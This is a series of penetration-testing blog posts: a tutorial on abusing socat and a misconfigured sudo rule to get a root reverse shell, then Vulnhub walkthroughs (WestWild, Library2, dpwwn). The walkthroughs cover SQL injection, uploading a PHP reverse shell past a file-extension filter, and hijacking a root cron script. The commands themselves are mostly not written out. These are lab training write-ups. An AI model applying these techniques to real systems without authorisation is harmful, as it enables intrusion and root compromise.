Linux For Pentester: socat Privilege Escalation

Welcome back, to grab knowledge of another command from “Linux for pentester” series. As we know there are many tools that can help the user to transfer data. Similarly, we are going to take advantage of another command i.e. “socat” which is a utility for data transfer between two addresses. So, now we will take this benefit of “socat” in our mission of privilege Escalation.

NOTE: “The main objective of publishing the series of “Linux for pentester” is to introduce the circumstances and any kind of hurdles that can be faced by any pentester while solving CTF challenges or OSCP labs which are based on Linux privilege escalations. Here we do not criticize any kind of misconfiguration that a network or system administrator does for providing higher permissions on any programs/binaries/files & etc.” 

Table of Content

Overview of socat             

  • What is socat
  • Basic parameters of socat
  • The operation achieved by socat

Abusing socat

  • SUDO Lab setups for privilege Escalation
  • Exploiting SUDO

What is socat

Socat is a network utility similar to netcat which supports ipv6, SSL and is available for both Windows and Linux. The first thing you will notice with this tool is that it has a different syntax on what you are used to with netcat or other standard Unix tools.

In other word you can say it is a command-line based utility that inaugurates two bidirectional byte streams and transfers data between them. Because the streams can be built from a large set of different types of data sinks and address type.

It is a utility for data transfer between two addresses which uses the syntax as “socat [options] <address><address>”.

Now we will start working with this most influencing tool by using its help command.

Basic parameters of socat

The most “basic” socat request would be: socat [options] <address><address>but another more existing example would be: socat -d -d – TCP4:www.example.com:80.

Where “-d -d” would be the options, “-“ would be the first address and TCP:www.example.com:80 would be the second address.

The above syntax can be more clearly understand by breaking each component down a bit more. Let’s first start with the address, since the address is the keystone aspect of socat.

Addresses:

As we know socat is comprised with two addresses for executing its result so it is more important to understand that what addresses are in actual and how they work. The address is something that the user provides via the command line. Entreating socat without any addresses results in a note as shown below:

~: socat

2018/09/22 19:12:30 socat[15505] E exactly 2 addresses required (there are 0); use option “-h” for help

Type:

After address, the other component of “socat” is “type” which is used to specify the kind of address that we need. Some of popular selections are TCP4, CREATE, EXEC, STDIN, STDOUT, PIPE, UDP4 etc, where the names are pretty self-understandable.

This is because certain address types have aliases. Similarly “-“ is one such alias which is used to represent STDIO. Another alias is TCP which stands for TCPv4. You can also use its man page to view lists of all other aliases.

Parameters:

Instantly after the type socat comes with zero or more required address parameters for its performance which is separated by:

The number of address parameters depends on the address type. The address type TCP4 requires a server description and a port description.

The operation achieved by socat

To send and receive text messages bidirectional: As we know “Socat” is a command-line based utility that establishes two bidirectional byte streams and transfers data between them. Now, I will start to establish a connection between two machines and will transfer messages between both of them.

For this, we need to start listener at one machine. In below image we have done this for “kali” which is acting as a listener and ready to take all of the commands that are ordered by “ubuntu” as shown below by framing command:

After running listener, our next step is to use socat command on another machine i.e. “ubuntu”. Here we need to specify the “IP” and port of the machine on which we have started the listener.

Now we have succeeded to share text between both terminals as shown in below image.

EXEC command using socat to take shell: socat command also tends the user to take the shell of any machine.  Here in this tutorial, I wish to take the shell of “ubuntu” on “kali” terminal by “EXEC type”.

Now on framing above command, we have successfully established a connection between two of the machine. After running listener on “ubuntu” now we will use socat command on “kali” by specifying the” IP” and “port” of the machine (ubuntu) which will help us to take the shell of ubuntu on kali as per our request.

Now to check whether you have got the shell of the desired machine or not, you can simply write “id”. As in below image you can see, it has directed us as user “raj” which is a user of “ubuntu”. It means we have successfully got the shell.

EXEC command using socat to transfer file: Now we will use another function of “EXEC” to transfer a file, here I want to transfer “passwd” file from “ubuntu” to “kali and again we will follow the same process.

As we switch to kali and run socat command it will result in us by opening “passwd” file of “source machine”.

Working with socat using another type: As we know socat uses the list of “type” like CREATE, EXEC, STDIN, STDOUT, PIPE etc.

Here in the below image, I have a text file named as “test” and now I want my listener machine to execute this file.

By using the above command first I have requested to open “test” file then I have pipe this output as the input for socat command.

As from below image you can see I have used “OPEN” function to which I have requested to create a file

 by the name of “raj” and will append the content of “test” file to this newly created file i.e. “raj”.

So now when I will run listener at “ubuntu” it will execute “raj” file showing the content of

“test” file as per desire.

Abusing socat

Sudo Rights Lab setups for Privilege Escalation

Now we will start our mission for privilege escalation. For this alike another command from “Linux for pentester” series here also first we need to set up our lab of “socat” command with administrative rights.

It can be clearly understood by the below image in which I have set sudo permission to local user (test) who can now run “socat command” as the root user.

To add sudo right open etc/sudoers file and type following as user Privilege specification.

Exploiting Sudo rights

First Method:

Now we will start exploiting socat facility by taking the privilege of sudoer’s permission. For this very first we must have sessions of a victim’s machine then only we can execute this task.

So now we will connect to the target machine with ssh, therefore, type following command to get access through local user login.

As we know “test” user attains sudo user privileges so now we will try to attain root shell of the host’s machine by the help of socat using EXEC options. Then we look for sudo right for “test” user (if given) and found that user “test” can execute the socat command as “root” without a password.

On a new terminal launch socat as a listener and enter the source IP and source port along with socat command to obtain reverse shell of the host machine.

Now we have successfully got the shell of victim’s machine with root privilege as shown in below screenshot.

Second Method:

We have another method to escalate the higher privilege shell i.e. using socat one liner reverse shell command. 

On new terminal start the socat as a listener and obtain root shell of the remote machine.

Conclusion: Hence in this way, we can make use of “socat” command to escalate the privilege of the remote machine.

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer, she is completely enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

WestWild: 1.1: Vulnhub Walkthorugh

Today we are going to take a new CTF challenge WestWild. The credit for making this VM machine goes to “Hashim Alsharef” and it is a boot2root challenge where we have to root the server and capture the flag to complete the challenge. You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

Scanning

  • Nmap

Enumeration

  • Enum4Linux
  • Smbclient

Exploitation

  • SSH

Privilege Escalation

  • Exploiting Sudo rights

Walkthrough:

Scanning:

Let’s start off with the scanning process. The target VM took the IP address of 192.168.1.104 automatically from our local wifi network.

Then we used Nmap for port enumeration and found port 22, 80,139 and 445 are open.

Enumeration:

We saw port 445 (smb) is open which means there may be a shared directory, so to further enumerate this as well as other ports, we tool help of Enum4Linux tool. From the results, we got some user details and a shared directory named wave.

To confirm our finding of the shared directory we used smbclient with a blank password and we got lucky and were able to list the shared directories.

Inside the wave directory, we got two text files FLAG1.txt & message_from_aveng.txt which we download to our kali system using get command.

We looked into the contents of these text files and found a base64 code inside the FLAG1.txt file. After decoding it we got a username wavex and a password door+open.

Exploitation:

We have got a username and a password, so we tried to SSH the target system and were successfully able to log in.

Now our job was to get to the root shell and in the process of doing so, we found a writable directory westsidesecret. And when we had a look inside the directory we got a script file named ififorget.sh.

Looking inside the script file we found one more username and password avenge:kaizen+80.

Privilege Escalation:

We switched to the user aveng using su command, put in the password. Now to get to the root shell we looked for the sudo permissions and found that this user can run all commands as root.

So we switched to the root shell using sudo su command and finally got the root flag.

Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here

The Library:2 Vulnhub Walkthrough

Today we are going to take another challenge Library2 which is a 2nd lab of the series Library. The credit for making this VM machine goes to “Avraham Cohen” and it is a boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

Scanning

  • Netdiscover
  • NMAP

Enumeration

  • Web Directory Search
  • Burpsuite 

Exploitation

  • Sqlmap
  • FTP
  • Shell Upload
  • Netcat

Privilege Escalation

  • Obtaining root password

Walkthrough:

Scanning:

Let’s start off with the scanning process. This target VM took the IP address of 192.168.1.107 automatically from our local Wi-Fi network.

We used Nmap for port scanning. We found that port 21 and 80 are open.

Enumeration:

As we can see port 80 is open, we opened the IP address in our browser, but we didn’t find anything useful on the webpage.

Firstly, we tried dirb in default mode but didn’t find any directory. Then we looked with .php extension and got one directory /library.php

After accessing the URL http://192.168.1.107/library.php  we got a webpage listing the name of few countries.

We just clicked on Netherlands and it didn’t give any information.

We captured the request in burpsuite and thought country parameter might be vulnerable to SQL injection, so we copied the raw request of burp into a text file sql and used an asterisk (*) to pinpoint our point of the target but we didn’t get anything.

Then we took a little help of the hint given by the creator of this machine on Vulnhub and changed the request from GET to POST.

You can see in the image below the request has changed from GET to POST.

Exploitation:

Now let’s use sqlmap on this new file.

From the results, we found a directory named library.

Further enumerating the library database for usernames and passwords.

We found a username globus and password AroundTheWorld for the ftp service.

We connected to the target system through ftp using the above-found credentials. We looked here and there but couldn’t find anything useful, so what we did is we grabbed a php-reverse-shell from /usr/share/webshells/php and modified the listener IP as ours and named it as shell.php.

Then we tried to upload it in the target machine using PUT command but we got access denied error.

It seemed there was some sort of file format filtering happening in the backend, we found a work around for this filter by changing the name of the script file from shell.php to shell.PHP

Now we executed the shell by just browsing to the URL http://192.168.1.107/shell.PHP and at the same time started a netcat listener on our Kali machine.

Privilege Escalation:

We successfully got the netcat session with a limited user privilege. And after a little bit of directory traversing, we found the password of a root inside a file named welcome located in the /var/mail directory.

Then we finally switched to the root shell using su command and successfully completed the challenge.

Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here

dpwwn: 1 Vulnhub Walkthrough

Today we are going to take another CTF challenge down. The credit for making this VM machine goes to “Debashish Pal” and it is a boot2root challenge where we have to root the machine and capture the flag to complete the challenge. You can download this VM here.

Security Level: Beginner

Penetrating Methodology:

  1. Scanning
  • Netdiscover
  • Nmap
  1. Enumeration
  • Mysql 
  1. Exploitation
  • SSH
  • Msfvenom
  • Netcat
  1. Privilege Escalation
  • Writable Script running on crontab

Walkthrough:

Scanning:

Let’s start of by scanning the network and identifying the host IP address. We can see our host IP is 192.168.1.101 by using Netdiscover.

Then, as usual, we used our favourite tool Nmap for port enumeration. We found that port 22, 80 and 3306 are open.

Enumeration:

As we can see mysql service is running (3306) we tried our luck to access the mysql server with root user and blank password and to our surprise, we were able to login.

Once we logged in, we got the database names, there we saw a database of ssh, we checked for its tables and found one user credentials mistic:[email protected]$$swordmistic

Exploitation:

We were able to ssh the target system using the above-found credentials. After logging in we found a file named logrot.sh. We looked inside the file and this is bash script which collects the logs.

And in the crontab, the same file is scheduled for execution with root privileges.

So what we did is we created a reverse netcat payload using msfvenom with listener ip as our kali and listener port 1234.

Then we copied the same payload inside the logrot.sh binary using the echo command.

Privilege Escalation:

Since the logrot.sh is scheduled in crontab with root privileges, we simultaneously started netcat listener on our kali machine and waited for the reverse shell. And after some time we got a root shell and eventually the root flag.

Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here